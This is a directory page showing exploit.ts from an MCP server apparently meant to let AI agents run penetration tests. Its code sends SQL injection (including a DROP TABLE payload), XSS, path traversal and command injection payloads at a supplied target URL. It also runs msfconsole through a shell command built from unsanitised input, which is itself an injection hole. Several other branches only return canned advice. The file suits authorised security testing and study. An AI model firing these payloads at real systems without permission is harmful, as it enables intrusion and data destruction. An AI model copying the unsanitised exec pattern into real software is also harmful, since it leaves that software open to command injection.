Skip to main content
Glama

MCP Pentest

by adriyansyah-mf
GitHub
TypeScript
1
OverviewInspectNewEndpointsSchemaRelated ServersReviewsScore
Need Help?View Source CodeReport Issue
exploit.tsā€¢19.1 kB
import { exec } from 'child_process'; import { promisify } from 'util'; import axios from 'axios'; import { ScanResult } from './recon.js'; const execAsync = promisify(exec); export interface ExploitResult { exploit_id: string; name: string; target: string; success: boolean; payload_used: string; result_type: 'shell' | 'file_read' | 'rce' | 'information' | 'dos' | 'privilege_escalation'; evidence: string; severity: 'low' | 'medium' | 'high' | 'critical'; recommendations: string[]; } export interface MetasploitModule { name: string; description: string; platform: string[]; targets: string[]; rank: string; disclosed: string; references: string[]; } export class ExploitTools { async metasploitSearch(service: string, platform?: string): Promise<ScanResult> { try { let command = `msfconsole -q -x "search ${service}`; if (platform) { command += ` platform:${platform}`; } command += '; exit"'; console.error(`Executing: ${command}`); const { stdout, stderr } = await execAsync(command, { timeout: 60000 // 1 min timeout }); const modules = this.parseMetasploitSearch(stdout); return { target: service, timestamp: new Date().toISOString(), tool: 'metasploit_search', results: { modules, total_found: modules.length, search_query: service, platform_filter: platform }, status: 'success' }; } catch (error) { return { target: service, timestamp: new Date().toISOString(), tool: 'metasploit_search', results: {}, status: 'error', error: error instanceof Error ? error.message : String(error) }; } } async exploitAttempt(target: string, vulnerability: string, payload?: string): Promise<ScanResult> { try { const exploitResults: ExploitResult[] = []; // Determine exploit strategy based on vulnerability type const vulnType = this.categorizeVulnerability(vulnerability); switch (vulnType) { case 'web': await this.attemptWebExploits(target, vulnerability, payload, exploitResults); break; case 'network': await this.attemptNetworkExploits(target, vulnerability, payload, exploitResults); break; case 'service': await this.attemptServiceExploits(target, vulnerability, payload, exploitResults); break; default: await this.attemptGenericExploits(target, vulnerability, payload, exploitResults); } return { target, timestamp: new Date().toISOString(), tool: 'exploit_attempt', results: { exploit_attempts: exploitResults, successful_exploits: exploitResults.filter(e => e.success), vulnerability_targeted: vulnerability, total_attempts: exploitResults.length }, status: 'success' }; } catch (error) { return { target, timestamp: new Date().toISOString(), tool: 'exploit_attempt', results: {}, status: 'error', error: error instanceof Error ? error.message : String(error) }; } } async customExploitBuilder(target: string, vulnType: string, techStack: string[]): Promise<ScanResult> { try { const customExploits: ExploitResult[] = []; // Build custom exploits based on technology stack for (const tech of techStack) { const exploits = await this.generateTechSpecificExploits(target, tech, vulnType); customExploits.push(...exploits); } return { target, timestamp: new Date().toISOString(), tool: 'custom_exploit_builder', results: { custom_exploits: customExploits, technologies_targeted: techStack, vulnerability_type: vulnType }, status: 'success' }; } catch (error) { return { target, timestamp: new Date().toISOString(), tool: 'custom_exploit_builder', results: {}, status: 'error', error: error instanceof Error ? error.message : String(error) }; } } // Helper methods private parseMetasploitSearch(output: string): MetasploitModule[] { const modules: MetasploitModule[] = []; const lines = output.split('\n'); for (const line of lines) { // Parse metasploit module output if (line.includes('exploit/') || line.includes('auxiliary/')) { const parts = line.trim().split(/\s+/); if (parts.length >= 3) { modules.push({ name: parts[0], description: parts.slice(2).join(' '), platform: [], // Would need more detailed parsing targets: [], rank: parts[1] || 'Unknown', disclosed: '', references: [] }); } } } return modules; } private categorizeVulnerability(vulnerability: string): 'web' | 'network' | 'service' | 'other' { const vulnLower = vulnerability.toLowerCase(); if (vulnLower.includes('xss') || vulnLower.includes('sql injection') || vulnLower.includes('csrf') || vulnLower.includes('directory traversal') || vulnLower.includes('file upload')) { return 'web'; } if (vulnLower.includes('buffer overflow') || vulnLower.includes('rce') || vulnLower.includes('command injection')) { return 'network'; } if (vulnLower.includes('ssh') || vulnLower.includes('ftp') || vulnLower.includes('smb') || vulnLower.includes('rdp')) { return 'service'; } return 'other'; } private async attemptWebExploits(target: string, vulnerability: string, payload: string | undefined, results: ExploitResult[]): Promise<void> { const vulnLower = vulnerability.toLowerCase(); // SQL Injection exploits if (vulnLower.includes('sql injection')) { await this.attemptSQLInjection(target, results); } // XSS exploits if (vulnLower.includes('xss')) { await this.attemptXSSExploit(target, results); } // Directory traversal exploits if (vulnLower.includes('directory traversal') || vulnLower.includes('path traversal')) { await this.attemptDirectoryTraversal(target, results); } // Command injection exploits if (vulnLower.includes('command injection')) { await this.attemptCommandInjection(target, results); } // File upload exploits if (vulnLower.includes('file upload')) { await this.attemptFileUploadExploit(target, results); } } private async attemptNetworkExploits(target: string, vulnerability: string, payload: string | undefined, results: ExploitResult[]): Promise<void> { // Network-level exploitation attempts const vulnLower = vulnerability.toLowerCase(); if (vulnLower.includes('buffer overflow')) { results.push({ exploit_id: 'buffer_overflow_attempt', name: 'Buffer Overflow Exploitation', target, success: false, // Would require actual buffer overflow payload payload_used: payload || 'Generic buffer overflow payload', result_type: 'rce', evidence: 'Manual exploitation required for buffer overflow', severity: 'critical', recommendations: [ 'Implement proper input validation', 'Use memory-safe programming languages', 'Enable stack protection mechanisms' ] }); } } private async attemptServiceExploits(target: string, vulnerability: string, payload: string | undefined, results: ExploitResult[]): Promise<void> { const vulnLower = vulnerability.toLowerCase(); // SSH exploits if (vulnLower.includes('ssh')) { await this.attemptSSHExploit(target, results); } // FTP exploits if (vulnLower.includes('ftp')) { await this.attemptFTPExploit(target, results); } // SMB exploits if (vulnLower.includes('smb')) { await this.attemptSMBExploit(target, results); } } private async attemptGenericExploits(target: string, vulnerability: string, payload: string | undefined, results: ExploitResult[]): Promise<void> { // Generic exploitation attempts results.push({ exploit_id: 'generic_exploit_attempt', name: 'Generic Exploitation Attempt', target, success: false, payload_used: payload || 'Generic payload', result_type: 'information', evidence: `Attempted exploitation of ${vulnerability}`, severity: 'medium', recommendations: [ 'Review and patch the identified vulnerability', 'Implement proper security controls', 'Monitor for exploitation attempts' ] }); } private async attemptSQLInjection(target: string, results: ExploitResult[]): Promise<void> { try { const payloads = [ "' OR '1'='1", "'; DROP TABLE users; --", "' UNION SELECT user(), database(), version() --", "' AND (SELECT COUNT(*) FROM information_schema.tables) > 0 --" ]; for (const payload of payloads) { try { const testUrl = `${target}?id=${encodeURIComponent(payload)}`; const response = await axios.get(testUrl, { timeout: 5000 }); // Check for SQL error messages or successful injection if (response.data.includes('mysql') || response.data.includes('syntax error') || response.data.includes('database') || response.data.includes('ORA-') || response.data.includes('PostgreSQL')) { results.push({ exploit_id: 'sql_injection_success', name: 'SQL Injection Exploitation', target, success: true, payload_used: payload, result_type: 'information', evidence: 'SQL error messages or data leakage detected', severity: 'high', recommendations: [ 'Use parameterized queries', 'Implement input validation', 'Apply principle of least privilege to database accounts' ] }); break; } } catch (error) { // Continue with next payload } } } catch (error) { console.error('SQL injection attempt failed:', error); } } private async attemptXSSExploit(target: string, results: ExploitResult[]): Promise<void> { try { const payloads = [ '<script>alert("XSS")</script>', '<img src="x" onerror="alert(document.cookie)">', '<svg onload="alert(\'XSS\')">', 'javascript:alert("XSS")' ]; for (const payload of payloads) { try { const testUrl = `${target}?search=${encodeURIComponent(payload)}`; const response = await axios.get(testUrl, { timeout: 5000 }); if (response.data.includes(payload.replace(/[<>]/g, ''))) { results.push({ exploit_id: 'xss_success', name: 'Cross-Site Scripting (XSS) Exploitation', target, success: true, payload_used: payload, result_type: 'rce', evidence: 'XSS payload successfully reflected', severity: 'high', recommendations: [ 'Implement proper output encoding', 'Use Content Security Policy (CSP)', 'Validate and sanitize all user inputs' ] }); break; } } catch (error) { // Continue with next payload } } } catch (error) { console.error('XSS attempt failed:', error); } } private async attemptDirectoryTraversal(target: string, results: ExploitResult[]): Promise<void> { try { const payloads = [ '../../../etc/passwd', '..\\..\\..\\windows\\system32\\drivers\\etc\\hosts', '....//....//....//etc/passwd', '%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd' ]; for (const payload of payloads) { try { const testUrl = `${target}?file=${encodeURIComponent(payload)}`; const response = await axios.get(testUrl, { timeout: 5000 }); if (response.data.includes('root:') || response.data.includes('127.0.0.1')) { results.push({ exploit_id: 'directory_traversal_success', name: 'Directory Traversal Exploitation', target, success: true, payload_used: payload, result_type: 'file_read', evidence: 'Sensitive system files accessed', severity: 'high', recommendations: [ 'Implement proper file access controls', 'Validate file paths and restrict access', 'Use whitelist-based file access' ] }); break; } } catch (error) { // Continue with next payload } } } catch (error) { console.error('Directory traversal attempt failed:', error); } } private async attemptCommandInjection(target: string, results: ExploitResult[]): Promise<void> { try { const payloads = [ '; cat /etc/passwd', '| type C:\\Windows\\System32\\drivers\\etc\\hosts', '`whoami`', '$(id)' ]; for (const payload of payloads) { try { const testUrl = `${target}?cmd=${encodeURIComponent(payload)}`; const response = await axios.get(testUrl, { timeout: 5000 }); if (response.data.includes('root:') || response.data.includes('uid=') || response.data.includes('127.0.0.1')) { results.push({ exploit_id: 'command_injection_success', name: 'Command Injection Exploitation', target, success: true, payload_used: payload, result_type: 'rce', evidence: 'Command execution successful', severity: 'critical', recommendations: [ 'Avoid system calls with user input', 'Implement strict input validation', 'Use whitelist-based command filtering' ] }); break; } } catch (error) { // Continue with next payload } } } catch (error) { console.error('Command injection attempt failed:', error); } } private async attemptFileUploadExploit(target: string, results: ExploitResult[]): Promise<void> { // File upload exploitation would require actual file upload functionality results.push({ exploit_id: 'file_upload_analysis', name: 'File Upload Security Analysis', target, success: false, payload_used: 'Manual file upload testing required', result_type: 'information', evidence: 'File upload functionality detected - manual testing required', severity: 'medium', recommendations: [ 'Implement file type validation', 'Scan uploaded files for malware', 'Store uploads outside web root', 'Implement file size limits' ] }); } private async attemptSSHExploit(target: string, results: ExploitResult[]): Promise<void> { // SSH exploitation attempts results.push({ exploit_id: 'ssh_bruteforce_recommended', name: 'SSH Brute Force Attack Recommendation', target, success: false, payload_used: 'Common credential dictionary', result_type: 'information', evidence: 'SSH service detected - brute force attack possible', severity: 'medium', recommendations: [ 'Implement key-based authentication', 'Disable root login', 'Use fail2ban or similar tools', 'Change default SSH port' ] }); } private async attemptFTPExploit(target: string, results: ExploitResult[]): Promise<void> { // FTP exploitation attempts results.push({ exploit_id: 'ftp_anonymous_check', name: 'FTP Anonymous Access Check', target, success: false, payload_used: 'Anonymous login attempt', result_type: 'information', evidence: 'FTP service detected - manual testing recommended', severity: 'low', recommendations: [ 'Disable anonymous FTP access', 'Use SFTP instead of FTP', 'Implement proper access controls', 'Monitor FTP access logs' ] }); } private async attemptSMBExploit(target: string, results: ExploitResult[]): Promise<void> { // SMB exploitation attempts results.push({ exploit_id: 'smb_vulnerability_check', name: 'SMB Security Assessment', target, success: false, payload_used: 'SMB enumeration', result_type: 'information', evidence: 'SMB service detected - potential for EternalBlue or similar exploits', severity: 'high', recommendations: [ 'Apply latest security patches', 'Disable SMBv1 protocol', 'Implement network segmentation', 'Monitor SMB traffic' ] }); } private async generateTechSpecificExploits(target: string, technology: string, vulnType: string): Promise<ExploitResult[]> { const exploits: ExploitResult[] = []; const techLower = technology.toLowerCase(); // WordPress specific exploits if (techLower.includes('wordpress')) { exploits.push({ exploit_id: 'wordpress_enum', name: 'WordPress User Enumeration', target, success: false, payload_used: 'REST API user enumeration', result_type: 'information', evidence: 'WordPress detected - user enumeration possible', severity: 'low', recommendations: [ 'Disable user enumeration', 'Keep WordPress updated', 'Use security plugins', 'Implement strong passwords' ] }); } // PHP specific exploits if (techLower.includes('php')) { exploits.push({ exploit_id: 'php_info_disclosure', name: 'PHP Information Disclosure', target, success: false, payload_used: 'phpinfo() detection', result_type: 'information', evidence: 'PHP detected - check for info disclosure', severity: 'medium', recommendations: [ 'Disable phpinfo() in production', 'Hide PHP version headers', 'Keep PHP updated', 'Implement proper error handling' ] }); } return exploits; } }

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/adriyansyah-mf/mcp-pentest'

If you have feedback or need assistance with the MCP directory API, please join our Discord server